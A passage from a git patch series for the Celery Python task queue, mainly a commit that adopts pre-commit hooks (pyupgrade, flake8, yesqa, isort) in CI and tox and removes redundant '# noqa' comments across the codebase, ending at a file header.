+ # if synack is enabled.
+ for job in tuple(self._cache.values()):
if not job._accepted:
- job._cancel()
+ if self.synack:
+ job._cancel()
+ else:
+ job.discard()
# clear the outgoing buffer as the tasks will be redelivered by
# the broker anyway.
From f462a437e3371acb867e94b52c2595b6d0a742d8 Mon Sep 17 00:00:00 2001
From: Thomas Grainger
Date: Tue, 20 Jul 2021 08:11:10 +0100
Subject: [PATCH 015/177] apply pre-commit (#6862)
* configure pre-commit (from twisted)
* remove black
* run pre-commit in ci
* configure isort with pre-commit
* configure pre-commit in tox
* allow E203 for black support in the future
* update contributing guide
* apply pyupgrade
* apply isort
* apply yes-qa
---
.github/workflows/lint_python.yml | 4 +---
.github/workflows/python-package.yml | 4 ++--
.pre-commit-config.yaml | 31 +++++++++++++++++++++-----
CONTRIBUTING.rst | 7 +++---
celery/__init__.py | 14 ++++++------
celery/_state.py | 8 +++----
celery/app/amqp.py | 2 +-
celery/app/base.py | 4 ++--
celery/app/log.py | 2 +-
celery/app/task.py | 4 ++--
celery/app/trace.py | 2 +-
celery/apps/beat.py | 2 +-
celery/backends/arangodb.py | 2 +-
celery/backends/base.py | 4 ++--
celery/backends/cache.py | 4 ++--
celery/backends/cassandra.py | 2 +-
celery/backends/cosmosdbsql.py | 2 +-
celery/backends/couchdb.py | 4 ++--
celery/backends/dynamodb.py | 2 +-
celery/backends/elasticsearch.py | 4 ++--
celery/backends/mongodb.py | 10 ++++-----
celery/backends/redis.py | 4 ++--
celery/beat.py | 2 +-
celery/canvas.py | 4 ++--
celery/concurrency/asynpool.py | 4 ++--
celery/concurrency/eventlet.py | 6 ++---
celery/concurrency/gevent.py | 2 +-
celery/events/state.py | 4 ++--
celery/exceptions.py | 4 ++--
celery/fixups/django.py | 2 +-
celery/platforms.py | 12 +++++-----
celery/result.py | 6 ++---
celery/schedules.py | 2 +-
celery/security/__init__.py | 2 +-
celery/utils/collections.py | 10 ++++-----
celery/utils/debug.py | 2 +-
celery/utils/saferepr.py | 2 +-
celery/utils/serialization.py | 4 ++--
celery/utils/sysinfo.py | 2 +-
celery/utils/threads.py | 10 ++++-----
celery/worker/request.py | 6 ++---
celery/worker/state.py | 4 ++--
celery/worker/worker.py | 2 +-
examples/celery_http_gateway/manage.py | 2 +-
examples/celery_http_gateway/urls.py | 3 +--
examples/django/demoapp/models.py | 2 +-
examples/django/demoapp/tasks.py | 3 ++-
examples/django/proj/wsgi.py | 2 +-
examples/eventlet/webcrawler.py | 6 ++---
setup.cfg | 1 +
t/benchmarks/bench_worker.py | 8 +++----
t/distro/test_CI_reqs.py | 2 +-
t/integration/test_canvas.py | 2 +-
t/unit/backends/test_arangodb.py | 2 +-
t/unit/backends/test_couchbase.py | 2 +-
t/unit/backends/test_couchdb.py | 2 +-
t/unit/backends/test_dynamodb.py | 2 +-
t/unit/concurrency/test_prefork.py | 4 ++--
t/unit/conftest.py | 2 +-
t/unit/contrib/test_sphinx.py | 1 -
t/unit/utils/test_dispatcher.py | 4 ++--
t/unit/utils/test_functional.py | 6 ++---
t/unit/utils/test_platforms.py | 2 +-
t/unit/worker/test_control.py | 2 +-
tox.ini | 8 +++----
65 files changed, 149 insertions(+), 133 deletions(-)
diff --git a/.github/workflows/lint_python.yml b/.github/workflows/lint_python.yml
index 5dd37639e08..8c262d25569 100644
--- a/.github/workflows/lint_python.yml
+++ b/.github/workflows/lint_python.yml
@@ -6,14 +6,12 @@ jobs:
steps:
- uses: actions/checkout@v2
- uses: actions/setup-python@v2
+ - uses: pre-commit/action@v2.0.3
- run: pip install --upgrade pip wheel
- run: pip install bandit codespell flake8 isort pytest pyupgrade tox
- run: bandit -r . || true
- run: codespell --ignore-words-list="brane,gool,ist,sherif,wil" --quiet-level=2 --skip="*.key" || true
- - run: flake8 . --count --select=E9,F63,F7,F82 --show-source --statistics
- - run: isort . || true
- run: pip install -r requirements.txt || true
- run: tox || true
- run: pytest . || true
- run: pytest --doctest-modules . || true
- - run: shopt -s globstar && pyupgrade --py36-plus **/*.py || true
diff --git a/.github/workflows/python-package.yml b/.github/workflows/python-package.yml
index 3f74d81eda7..42c56683e4a 100644
--- a/.github/workflows/python-package.yml
+++ b/.github/workflows/python-package.yml
@@ -74,5 +74,5 @@ jobs:
with: { python-version: 3.9 }
- name: Install tox
run: python -m pip install tox
- - name: Lint with flake8
- run: tox --verbose -e flake8
+ - name: Lint with pre-commit
+ run: tox --verbose -e lint
diff --git a/.pre-commit-config.yaml b/.pre-commit-config.yaml
index 5939ad63655..057c78f4787 100644
--- a/.pre-commit-config.yaml
+++ b/.pre-commit-config.yaml
@@ -1,10 +1,29 @@
repos:
-- repo: https://github.com/ambv/black
- rev: stable
+ - repo: https://github.com/asottile/pyupgrade
+ rev: v2.21.2
hooks:
- - id: black
- language_version: python3.7
-- repo: https://github.com/pre-commit/pre-commit-hooks
+ - id: pyupgrade
+ args: ["--py36-plus"]
+
+ - repo: https://gitlab.com/pycqa/flake8
+ rev: 3.9.2
+ hooks:
+ - id: flake8
+
+ - repo: https://github.com/asottile/yesqa
rev: v1.2.3
hooks:
- - id: flake8
+ - id: yesqa
+
+ - repo: https://github.com/pre-commit/pre-commit-hooks
+ rev: v4.0.1
+ hooks:
+ - id: check-merge-conflict
+ - id: check-toml
+ - id: check-yaml
+ - id: mixed-line-ending
+
+ - repo: https://github.com/pycqa/isort
+ rev: 5.9.2
+ hooks:
+ - id: isort
diff --git a/CONTRIBUTING.rst b/CONTRIBUTING.rst
index a774377243a..5e51b3083f5 100644
--- a/CONTRIBUTING.rst
+++ b/CONTRIBUTING.rst
@@ -830,14 +830,13 @@ make it easier for the maintainers to accept your proposed changes:
``pytest -xv --cov=celery --cov-report=xml --cov-report term``.
You can check the current test coverage here: https://codecov.io/gh/celery/celery
-- [ ] Run ``flake8`` against the code. The following commands are valid
+- [ ] Run ``pre-commit`` against the code. The following commands are valid
and equivalent.:
.. code-block:: console
- $ flake8 -j 2 celery/ t/
- $ make flakecheck
- $ tox -e flake8
+ $ pre-commit run --all-files
+ $ tox -e lint
- [ ] Build api docs to make sure everything is OK. The following commands are valid
and equivalent.:
diff --git a/celery/__init__.py b/celery/__init__.py
index ae287ea2530..1169a2d55f1 100644
--- a/celery/__init__.py
+++ b/celery/__init__.py
@@ -13,7 +13,7 @@
from collections import namedtuple
# Lazy loading
-from . import local # noqa
+from . import local
SERIES = 'sun-harmonics'
@@ -65,15 +65,15 @@ def debug_import(name, locals=None, globals=None,
STATICA_HACK = True
globals()['kcah_acitats'[::-1].upper()] = False
if STATICA_HACK: # pragma: no cover
- from celery._state import current_app, current_task # noqa
- from celery.app import shared_task # noqa
- from celery.app.base import Celery # noqa
- from celery.app.task import Task # noqa
- from celery.app.utils import bugreport # noqa
+ from celery._state import current_app, current_task
+ from celery.app import shared_task
+ from celery.app.base import Celery
+ from celery.app.task import Task
+ from celery.app.utils import bugreport
from celery.canvas import (chain, chord, chunks, group, # noqa
maybe_signature, signature, subtask, xmap,
xstarmap)
- from celery.utils import uuid # noqa
+ from celery.utils import uuid
# Eventlet/gevent patching must happen before importing
# anything else, so these tools must be at top-level.
diff --git a/celery/_state.py b/celery/_state.py
index 0e671151685..5d3ed5fc56f 100644
--- a/celery/_state.py
+++ b/celery/_state.py
@@ -109,9 +109,9 @@ def get_current_app():
"""Return the current app."""
raise RuntimeError('USES CURRENT APP')
elif os.environ.get('C_WARN_APP'): # pragma: no cover
- def get_current_app(): # noqa
+ def get_current_app():
import traceback
- print('-- USES CURRENT_APP', file=sys.stderr) # noqa+
+ print('-- USES CURRENT_APP', file=sys.stderr) # +
traceback.print_stack(file=sys.stderr)
return _get_current_app()
else:
@@ -168,12 +168,12 @@ def _app_or_default_trace(app=None): # pragma: no cover
current_process = None
if app is None:
if getattr(_tls, 'current_app', None):
- print('-- RETURNING TO CURRENT APP --') # noqa+
+ print('-- RETURNING TO CURRENT APP --') # +
print_stack()
return _tls.current_app
if not current_process or current_process()._name == 'MainProcess':
raise Exception('DEFAULT APP')
- print('-- RETURNING TO DEFAULT APP --') # noqa+
+ print('-- RETURNING TO DEFAULT APP --') # +
print_stack()
return default_app
return app
diff --git a/celery/app/amqp.py b/celery/app/amqp.py
index a574b2dd792..12a511d75fd 100644
--- a/celery/app/amqp.py
+++ b/celery/app/amqp.py
@@ -558,7 +558,7 @@ def queues(self):
"""Queue name⇒ declaration mapping."""
return self.Queues(self.app.conf.task_queues)
- @queues.setter # noqa
+ @queues.setter
def queues(self, queues):
return self.Queues(queues)
diff --git a/celery/app/base.py b/celery/app/base.py
index 47570763075..f9ac8c18818 100644
--- a/celery/app/base.py
+++ b/celery/app/base.py
@@ -1239,7 +1239,7 @@ def conf(self):
return self._conf
@conf.setter
- def conf(self, d): # noqa
+ def conf(self, d):
self._conf = d
@cached_property
@@ -1301,4 +1301,4 @@ def timezone(self):
return timezone.get_timezone(conf.timezone)
-App = Celery # noqa: E305 XXX compat
+App = Celery # XXX compat
diff --git a/celery/app/log.py b/celery/app/log.py
index 7e036746cc0..01b45aa4ae1 100644
--- a/celery/app/log.py
+++ b/celery/app/log.py
@@ -245,6 +245,6 @@ def get_default_logger(self, name='celery', **kwargs):
def already_setup(self):
return self._setup
- @already_setup.setter # noqa
+ @already_setup.setter
def already_setup(self, was_setup):
self._setup = was_setup
diff --git a/celery/app/task.py b/celery/app/task.py
index 1e50e613b58..726bb103fe7 100644
--- a/celery/app/task.py
+++ b/celery/app/task.py
@@ -1073,7 +1073,7 @@ def backend(self):
return backend
@backend.setter
- def backend(self, value): # noqa
+ def backend(self, value):
self._backend = value
@property
@@ -1081,4 +1081,4 @@ def __name__(self):
return self.__class__.__name__
-BaseTask = Task # noqa: E305 XXX compat alias
+BaseTask = Task # XXX compat alias
diff --git a/celery/app/trace.py b/celery/app/trace.py
index a5e3fc3f5a8..ad2bd581dbb 100644
--- a/celery/app/trace.py
+++ b/celery/app/trace.py
@@ -316,7 +316,7 @@ def build_tracer(name, task, loader=None, hostname=None, store_errors=True,
:keyword request: Request dict.
"""
- # noqa: C901
+
# pylint: disable=too-many-statements
# If the task doesn't define a custom __call__ method
diff --git a/celery/apps/beat.py b/celery/apps/beat.py
index 41437718e9c..8652c62730a 100644
--- a/celery/apps/beat.py
+++ b/celery/apps/beat.py
@@ -111,7 +111,7 @@ def start_scheduler(self):
def banner(self, service):
c = self.colored
- return str( # flake8: noqa
+ return str(
c.blue('__ ', c.magenta('-'),
c.blue(' ... __ '), c.magenta('-'),
c.blue(' _\n'),
diff --git a/celery/backends/arangodb.py b/celery/backends/arangodb.py
index 8297398a6c2..1cd82078070 100644
--- a/celery/backends/arangodb.py
+++ b/celery/backends/arangodb.py
@@ -17,7 +17,7 @@
from pyArango import connection as py_arango_connection
from pyArango.theExceptions import AQLQueryError
except ImportError:
- py_arango_connection = AQLQueryError = None # noqa
+ py_arango_connection = AQLQueryError = None
__all__ = ('ArangoDbBackend',)
diff --git a/celery/backends/base.py b/celery/backends/base.py
index fb1cc408d49..71ca218d56e 100644
--- a/celery/backends/base.py
+++ b/celery/backends/base.py
@@ -129,7 +129,7 @@ def __init__(self, app,
# precedence: accept, conf.result_accept_content, conf.accept_content
self.accept = conf.result_accept_content if accept is None else accept
- self.accept = conf.accept_content if self.accept is None else self.accept # noqa: E501
+ self.accept = conf.accept_content if self.accept is None else self.accept
self.accept = prepare_accept_content(self.accept)
self.always_retry = conf.get('result_backend_always_retry', False)
@@ -758,7 +758,7 @@ class BaseBackend(Backend, SyncBackendMixin):
"""Base (synchronous) result backend."""
-BaseDictBackend = BaseBackend # noqa: E305 XXX compat
+BaseDictBackend = BaseBackend # XXX compat
class BaseKeyValueStoreBackend(Backend):
diff --git a/celery/backends/cache.py b/celery/backends/cache.py
index f3d13d95304..7d17837ffd7 100644
--- a/celery/backends/cache.py
+++ b/celery/backends/cache.py
@@ -33,7 +33,7 @@ def import_best_memcache():
is_pylibmc = True
except ImportError:
try:
- import memcache # noqa
+ import memcache
except ImportError:
raise ImproperlyConfigured(REQUIRES_BACKEND)
_imp[0] = (is_pylibmc, memcache, memcache_key_t)
@@ -47,7 +47,7 @@ def get_best_memcache(*args, **kwargs):
Client = _Client = memcache.Client
if not is_pylibmc:
- def Client(*args, **kwargs): # noqa
+ def Client(*args, **kwargs):
kwargs.pop('behaviors', None)
return _Client(*args, **kwargs)
diff --git a/celery/backends/cassandra.py b/celery/backends/cassandra.py
index 1220063b63c..bf4f69c2753 100644
--- a/celery/backends/cassandra.py
+++ b/celery/backends/cassandra.py
@@ -13,7 +13,7 @@
import cassandra.cluster
import cassandra.query
except ImportError: # pragma: no cover
- cassandra = None # noqa
+ cassandra = None
__all__ = ('CassandraBackend',)
diff --git a/celery/backends/cosmosdbsql.py b/celery/backends/cosmosdbsql.py
index 899cbcb866c..344e46ede0c 100644
--- a/celery/backends/cosmosdbsql.py
+++ b/celery/backends/cosmosdbsql.py
@@ -17,7 +17,7 @@
from pydocumentdb.retry_options import RetryOptions
except ImportError: # pragma: no cover
pydocumentdb = DocumentClient = ConsistencyLevel = PartitionKind = \
- HTTPFailure = ConnectionPolicy = RetryOptions = None # noqa
+ HTTPFailure = ConnectionPolicy = RetryOptions = None
__all__ = ("CosmosDBSQLBackend",)
diff --git a/celery/backends/couchdb.py b/celery/backends/couchdb.py
index 43470ed109b..a4b040dab75 100644
--- a/celery/backends/couchdb.py
+++ b/celery/backends/couchdb.py
@@ -9,7 +9,7 @@
try:
import pycouchdb
except ImportError:
- pycouchdb = None # noqa
+ pycouchdb = None
__all__ = ('CouchBackend',)
@@ -42,7 +42,7 @@ def __init__(self, url=None, *args, **kwargs):
uscheme = uhost = uport = uname = upass = ucontainer = None
if url:
- _, uhost, uport, uname, upass, ucontainer, _ = _parse_url(url) # noqa
+ _, uhost, uport, uname, upass, ucontainer, _ = _parse_url(url)
ucontainer = ucontainer.strip('/') if ucontainer else None
self.scheme = uscheme or self.scheme
diff --git a/celery/backends/dynamodb.py b/celery/backends/dynamodb.py
index 25a8e3423c1..4fbd9aaf7d7 100644
--- a/celery/backends/dynamodb.py
+++ b/celery/backends/dynamodb.py
@@ -13,7 +13,7 @@
import boto3
from botocore.exceptions import ClientError
except ImportError: # pragma: no cover
- boto3 = ClientError = None # noqa
+ boto3 = ClientError = None
__all__ = ('DynamoDBBackend',)
diff --git a/celery/backends/elasticsearch.py b/celery/backends/elasticsearch.py
index 886acd02475..42e93b23d53 100644
--- a/celery/backends/elasticsearch.py
+++ b/celery/backends/elasticsearch.py
@@ -12,7 +12,7 @@
try:
import elasticsearch
except ImportError: # pragma: no cover
- elasticsearch = None # noqa
+ elasticsearch = None
__all__ = ('ElasticsearchBackend',)
@@ -52,7 +52,7 @@ def __init__(self, url=None, *args, **kwargs):
index = doc_type = scheme = host = port = username = password = None
if url:
- scheme, host, port, username, password, path, _ = _parse_url(url) # noqa
+ scheme, host, port, username, password, path, _ = _parse_url(url)
if scheme == 'elasticsearch':
scheme = None
if path:
diff --git a/celery/backends/mongodb.py b/celery/backends/mongodb.py
index 60448663aa9..b78e4d015b4 100644
--- a/celery/backends/mongodb.py
+++ b/celery/backends/mongodb.py
@@ -13,18 +13,18 @@
try:
import pymongo
except ImportError: # pragma: no cover
- pymongo = None # noqa
+ pymongo = None
if pymongo:
try:
from bson.binary import Binary
except ImportError: # pragma: no cover
- from pymongo.binary import Binary # noqa
- from pymongo.errors import InvalidDocument # noqa
+ from pymongo.binary import Binary
+ from pymongo.errors import InvalidDocument
else: # pragma: no cover
- Binary = None # noqa
+ Binary = None
- class InvalidDocument(Exception): # noqa
+ class InvalidDocument(Exception):
pass
__all__ = ('MongoBackend',)
diff --git a/celery/backends/redis.py b/celery/backends/redis.py
index 23d7ac3ccc2..e4a4cc104e7 100644
--- a/celery/backends/redis.py
+++ b/celery/backends/redis.py
@@ -26,8 +26,8 @@
import redis.connection
from kombu.transport.redis import get_redis_error_classes
except ImportError: # pragma: no cover
- redis = None # noqa
- get_redis_error_classes = None # noqa
+ redis = None
+ get_redis_error_classes = None
try:
import redis.sentinel
diff --git a/celery/beat.py b/celery/beat.py
index 74c67f94ed9..7f72f2f2fec 100644
--- a/celery/beat.py
+++ b/celery/beat.py
@@ -703,7 +703,7 @@ def stop(self):
except NotImplementedError: # pragma: no cover
_Process = None
else:
- class _Process(Process): # noqa
+ class _Process(Process):
def __init__(self, app, **kwargs):
super().__init__()
diff --git a/celery/canvas.py b/celery/canvas.py
index 34bcd6a0085..8a471ec0471 100644
--- a/celery/canvas.py
+++ b/celery/canvas.py
@@ -1579,7 +1579,7 @@ def signature(varies, *args, **kwargs):
return Signature(varies, *args, **kwargs)
-subtask = signature # noqa: E305 XXX compat
+subtask = signature # XXX compat
def maybe_signature(d, app=None, clone=False):
@@ -1609,4 +1609,4 @@ def maybe_signature(d, app=None, clone=False):
return d
-maybe_subtask = maybe_signature # noqa: E305 XXX compat
+maybe_subtask = maybe_signature # XXX compat
diff --git a/celery/concurrency/asynpool.py b/celery/concurrency/asynpool.py
index c6612aff64f..0c16187823b 100644
--- a/celery/concurrency/asynpool.py
+++ b/celery/concurrency/asynpool.py
@@ -48,13 +48,13 @@
except ImportError: # pragma: no cover
- def __read__(fd, buf, size, read=os.read): # noqa
+ def __read__(fd, buf, size, read=os.read):
chunk = read(fd, size)
n = len(chunk)
if n != 0:
buf.write(chunk)
return n
- readcanbuf = False # noqa
+ readcanbuf = False
def unpack_from(fmt, iobuf, unpack=unpack): # noqa
return unpack(fmt, iobuf.getvalue()) # <-- BytesIO
diff --git a/celery/concurrency/eventlet.py b/celery/concurrency/eventlet.py
index bf794d47f16..c6bb3415f69 100644
--- a/celery/concurrency/eventlet.py
+++ b/celery/concurrency/eventlet.py
@@ -2,11 +2,11 @@
import sys
from time import monotonic
-from kombu.asynchronous import timer as _timer # noqa
+from kombu.asynchronous import timer as _timer
-from celery import signals # noqa
+from celery import signals
-from . import base # noqa
+from . import base
__all__ = ('TaskPool',)
diff --git a/celery/concurrency/gevent.py b/celery/concurrency/gevent.py
index 0bb3e4919ff..33a61bf6198 100644
--- a/celery/concurrency/gevent.py
+++ b/celery/concurrency/gevent.py
@@ -8,7 +8,7 @@
try:
from gevent import Timeout
except ImportError: # pragma: no cover
- Timeout = None # noqa
+ Timeout = None
__all__ = ('TaskPool',)
diff --git a/celery/events/state.py b/celery/events/state.py
index 4fef2bf38cc..f8ff9ad687e 100644
--- a/celery/events/state.py
+++ b/celery/events/state.py
@@ -99,7 +99,7 @@ def __call__(self, *args, **kwargs):
return self.fun(*args, **kwargs)
-Callable.register(CallableDefaultdict) # noqa: E305
+Callable.register(CallableDefaultdict)
@memoize(maxsize=1000, keyfun=lambda a, _: a[0])
@@ -517,7 +517,7 @@ def worker_event(self, type_, fields):
return self._event(dict(fields, type='-'.join(['worker', type_])))[0]
def _create_dispatcher(self):
- # noqa: C901
+
# pylint: disable=too-many-statements
# This code is highly optimized, but not for reusability.
get_handler = self.handlers.__getitem__
diff --git a/celery/exceptions.py b/celery/exceptions.py
index 775418d113d..64b017aa7c0 100644
--- a/celery/exceptions.py
+++ b/celery/exceptions.py
@@ -183,7 +183,7 @@ def __reduce__(self):
return self.__class__, (self.message, self.exc, self.when)
-RetryTaskError = Retry # noqa: E305 XXX compat
+RetryTaskError = Retry # XXX compat
class Ignore(TaskPredicate):
@@ -271,7 +271,7 @@ class WorkerTerminate(SystemExit):
"""Signals that the worker should terminate immediately."""
-SystemTerminate = WorkerTerminate # noqa: E305 XXX compat
+SystemTerminate = WorkerTerminate # XXX compat
class WorkerShutdown(SystemExit):
diff --git a/celery/fixups/django.py b/celery/fixups/django.py
index 3064601c473..019e695ea2e 100644
--- a/celery/fixups/django.py
+++ b/celery/fixups/django.py
@@ -37,7 +37,7 @@ def fixup(app, env='DJANGO_SETTINGS_MODULE'):
SETTINGS_MODULE = os.environ.get(env)
if SETTINGS_MODULE and 'django' not in app.loader_cls.lower():
try:
- import django # noqa
+ import django
except ImportError:
warnings.warn(FixupWarning(ERR_NOT_INSTALLED))
else:
diff --git a/celery/platforms.py b/celery/platforms.py
index 16cfa8d9a04..82fed9cb9f0 100644
--- a/celery/platforms.py
+++ b/celery/platforms.py
@@ -236,7 +236,7 @@ def write_pid(self):
rfh.close()
-PIDFile = Pidfile # noqa: E305 XXX compat alias
+PIDFile = Pidfile # XXX compat alias
def create_pidlock(pidfile):
@@ -625,15 +625,15 @@ def arm_alarm(self, seconds):
_signal.setitimer(_signal.ITIMER_REAL, seconds)
else: # pragma: no cover
try:
- from itimer import alarm as _itimer_alarm # noqa
+ from itimer import alarm as _itimer_alarm
except ImportError:
- def arm_alarm(self, seconds): # noqa
+ def arm_alarm(self, seconds):
_signal.alarm(math.ceil(seconds))
else: # pragma: no cover
- def arm_alarm(self, seconds): # noqa
- return _itimer_alarm(seconds) # noqa
+ def arm_alarm(self, seconds):
+ return _itimer_alarm(seconds)
def reset_alarm(self):
return _signal.alarm(0)
@@ -731,7 +731,7 @@ def set_mp_process_title(*a, **k):
"""Disabled feature."""
else:
- def set_mp_process_title(progname, info=None, hostname=None): # noqa
+ def set_mp_process_title(progname, info=None, hostname=None):
"""Set the :command:`ps` name from the current process name.
Only works if :pypi:`setproctitle` is installed.
diff --git a/celery/result.py b/celery/result.py
index d8d7d1685c5..5ed08e3886c 100644
--- a/celery/result.py
+++ b/celery/result.py
@@ -2,9 +2,9 @@
import datetime
import time
-from weakref import proxy
from collections import deque
from contextlib import contextmanager
+from weakref import proxy
from kombu.utils.objects import cached_property
from vine import Thenable, barrier, promise
@@ -483,7 +483,7 @@ def task_id(self):
"""Compat. alias to :attr:`id`."""
return self.id
- @task_id.setter # noqa
+ @task_id.setter
def task_id(self, id):
self.id = id
@@ -852,7 +852,7 @@ def app(self):
return self._app
@app.setter
- def app(self, app): # noqa
+ def app(self, app):
self._app = app
@property
diff --git a/celery/schedules.py b/celery/schedules.py
index 3db64e4dab6..3731b747cee 100644
--- a/celery/schedules.py
+++ b/celery/schedules.py
@@ -79,7 +79,7 @@ def maybe_make_aware(self, dt):
def app(self):
return self._app or current_app._get_current_object()
- @app.setter # noqa
+ @app.setter
def app(self, app):
self._app = app
diff --git a/celery/security/__init__.py b/celery/security/__init__.py
index 316ec1db5c1..26237856939 100644
--- a/celery/security/__init__.py
+++ b/celery/security/__init__.py
@@ -5,7 +5,7 @@
from celery.exceptions import ImproperlyConfigured
-from .serialization import register_auth # noqa: need cryptography first
+from .serialization import register_auth # : need cryptography first
CRYPTOGRAPHY_NOT_INSTALLED = """\
You need to install the cryptography library to use the auth serializer.
diff --git a/celery/utils/collections.py b/celery/utils/collections.py
index dc4bd23437a..1fedc775771 100644
--- a/celery/utils/collections.py
+++ b/celery/utils/collections.py
@@ -20,9 +20,9 @@
try:
from django.utils.functional import LazyObject, LazySettings
except ImportError:
- class LazyObject: # noqa
+ class LazyObject:
pass
- LazySettings = LazyObject # noqa
+ LazySettings = LazyObject
__all__ = (
'AttributeDictMixin', 'AttributeDict', 'BufferMap', 'ChainMap',
@@ -197,7 +197,7 @@ def _iterate_values(self):
values = _iterate_values
-MutableMapping.register(DictAttribute) # noqa: E305
+MutableMapping.register(DictAttribute)
class ChainMap(MutableMapping):
@@ -667,7 +667,7 @@ def _heap_overload(self):
return len(self._heap) * 100 / max(len(self._data), 1) - 100
-MutableSet.register(LimitedSet) # noqa: E305
+MutableSet.register(LimitedSet)
class Evictable:
@@ -768,7 +768,7 @@ def _evictcount(self):
return len(self)
-Sequence.register(Messagebuffer) # noqa: E305
+Sequence.register(Messagebuffer)
class BufferMap(OrderedDict, Evictable):
diff --git a/celery/utils/debug.py b/celery/utils/debug.py
index 0641f1d6c92..3515dc84f9b 100644
--- a/celery/utils/debug.py
+++ b/celery/utils/debug.py
@@ -12,7 +12,7 @@
try:
from psutil import Process
except ImportError:
- Process = None # noqa
+ Process = None
__all__ = (
'blockdetection', 'sample_mem', 'memdump', 'sample',
diff --git a/celery/utils/saferepr.py b/celery/utils/saferepr.py
index ec73e2069a6..d079734fc5d 100644
--- a/celery/utils/saferepr.py
+++ b/celery/utils/saferepr.py
@@ -191,7 +191,7 @@ def _saferepr(o, maxlen=None, maxlevels=3, seen=None):
def _reprseq(val, lit_start, lit_end, builtin_type, chainer):
# type: (Sequence, _literal, _literal, Any, Any) -> Tuple[Any, ...]
- if type(val) is builtin_type: # noqa
+ if type(val) is builtin_type:
return lit_start, lit_end, chainer(val)
return (
_literal(f'{type(val).__name__}({lit_start.value}', False, +1),
diff --git a/celery/utils/serialization.py b/celery/utils/serialization.py
index af7804a2132..dc3815e1f7b 100644
--- a/celery/utils/serialization.py
+++ b/celery/utils/serialization.py
@@ -13,7 +13,7 @@
try:
import cPickle as pickle
except ImportError:
- import pickle # noqa
+ import pickle
__all__ = (
'UnpickleableExceptionWrapper', 'subclass_exception',
@@ -30,7 +30,7 @@
'on': True, 'off': False}
-def subclass_exception(name, parent, module): # noqa
+def subclass_exception(name, parent, module):
"""Create new exception class."""
return type(name, (parent,), {'__module__': module})
diff --git a/celery/utils/sysinfo.py b/celery/utils/sysinfo.py
index 7032d4de885..57425dd8173 100644
--- a/celery/utils/sysinfo.py
+++ b/celery/utils/sysinfo.py
@@ -14,7 +14,7 @@ def _load_average():
else: # pragma: no cover
# Windows doesn't have getloadavg
- def _load_average(): # noqa
+ def _load_average():
return (0.0, 0.0, 0.0)
diff --git a/celery/utils/threads.py b/celery/utils/threads.py
index b080ca42e37..a80b9ed69cf 100644
--- a/celery/utils/threads.py
+++ b/celery/utils/threads.py
@@ -13,15 +13,15 @@
from greenlet import getcurrent as get_ident
except ImportError: # pragma: no cover
try:
- from _thread import get_ident # noqa
+ from _thread import get_ident
except ImportError:
try:
- from thread import get_ident # noqa
+ from thread import get_ident
except ImportError: # pragma: no cover
try:
- from _dummy_thread import get_ident # noqa
+ from _dummy_thread import get_ident
except ImportError:
- from dummy_thread import get_ident # noqa
+ from dummy_thread import get_ident
__all__ = (
@@ -328,4 +328,4 @@ def __len__(self):
# since each thread has its own greenlet we can just use those as
# identifiers for the context. If greenlets aren't available we
# fall back to the current thread ident.
- LocalStack = _LocalStack # noqa
+ LocalStack = _LocalStack
diff --git a/celery/worker/request.py b/celery/worker/request.py
index 7cdb87fe054..c30869bddbf 100644
--- a/celery/worker/request.py
+++ b/celery/worker/request.py
@@ -50,7 +50,7 @@ def __optimize__():
_does_info = logger.isEnabledFor(logging.INFO)
-__optimize__() # noqa: E305
+__optimize__()
# Localize
tz_or_local = timezone.tz_or_local
@@ -291,7 +291,7 @@ def task_id(self):
# XXX compat
return self.id
- @task_id.setter # noqa
+ @task_id.setter
def task_id(self, value):
self.id = value
@@ -300,7 +300,7 @@ def task_name(self):
# XXX compat
return self.name
- @task_name.setter # noqa
+ @task_name.setter
def task_name(self, value):
self.name = value
diff --git a/celery/worker/state.py b/celery/worker/state.py
index 5b2ed68c5fe..3afb2e8e3b9 100644
--- a/celery/worker/state.py
+++ b/celery/worker/state.py
@@ -153,7 +153,7 @@ def on_shutdown():
sum(bench_sample) / len(bench_sample)))
memdump()
- def task_reserved(request): # noqa
+ def task_reserved(request):
"""Called when a task is reserved by the worker."""
global bench_start
global bench_first
@@ -165,7 +165,7 @@ def task_reserved(request): # noqa
return __reserved(request)
- def task_ready(request): # noqa
+ def task_ready(request):
"""Called when a task is completed."""
global all_count
global bench_start
diff --git a/celery/worker/worker.py b/celery/worker/worker.py
index 382802a2738..f67d1a336da 100644
--- a/celery/worker/worker.py
+++ b/celery/worker/worker.py
@@ -38,7 +38,7 @@
try:
import resource
except ImportError: # pragma: no cover
- resource = None # noqa
+ resource = None
__all__ = ('WorkController',)
diff --git a/examples/celery_http_gateway/manage.py b/examples/celery_http_gateway/manage.py
index 2c41aaabd87..3109e100b4d 100644
--- a/examples/celery_http_gateway/manage.py
+++ b/examples/celery_http_gateway/manage.py
@@ -3,7 +3,7 @@
from django.core.management import execute_manager
try:
- import settings # Assumed to be in the same directory.
+ import settings # Assumed to be in the same directory.
except ImportError:
import sys
sys.stderr.write(
diff --git a/examples/celery_http_gateway/urls.py b/examples/celery_http_gateway/urls.py
index 522b39ff8d1..c916ff8029b 100644
--- a/examples/celery_http_gateway/urls.py
+++ b/examples/celery_http_gateway/urls.py
@@ -1,7 +1,6 @@
+from celery_http_gateway.tasks import hello_world
from django.conf.urls.defaults import (handler404, handler500, # noqa
include, patterns, url)
-
-from celery_http_gateway.tasks import hello_world
from djcelery import views as celery_views
# Uncomment the next two lines to enable the admin:
diff --git a/examples/django/demoapp/models.py b/examples/django/demoapp/models.py
index bec42a2b041..1f7d09ead22 100644
--- a/examples/django/demoapp/models.py
+++ b/examples/django/demoapp/models.py
@@ -1,4 +1,4 @@
-from django.db import models # noqa
+from django.db import models
class Widget(models.Model):
diff --git a/examples/django/demoapp/tasks.py b/examples/django/demoapp/tasks.py
index ac309b8c9fd..c16b76b4c4f 100644
--- a/examples/django/demoapp/tasks.py
+++ b/examples/django/demoapp/tasks.py
@@ -1,8 +1,9 @@
# Create your tasks here
-from celery import shared_task
from demoapp.models import Widget
+from celery import shared_task
+
@shared_task
def add(x, y):
diff --git a/examples/django/proj/wsgi.py b/examples/django/proj/wsgi.py
index 1bb1b542185..d07dbf074cc 100644
--- a/examples/django/proj/wsgi.py
+++ b/examples/django/proj/wsgi.py
@@ -19,7 +19,7 @@
# This application object is used by any WSGI server configured to use this
# file. This includes Django's development server, if the WSGI_APPLICATION
# setting points here.
-from django.core.wsgi import get_wsgi_application # noqa
+from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'proj.settings')
diff --git a/examples/eventlet/webcrawler.py b/examples/eventlet/webcrawler.py
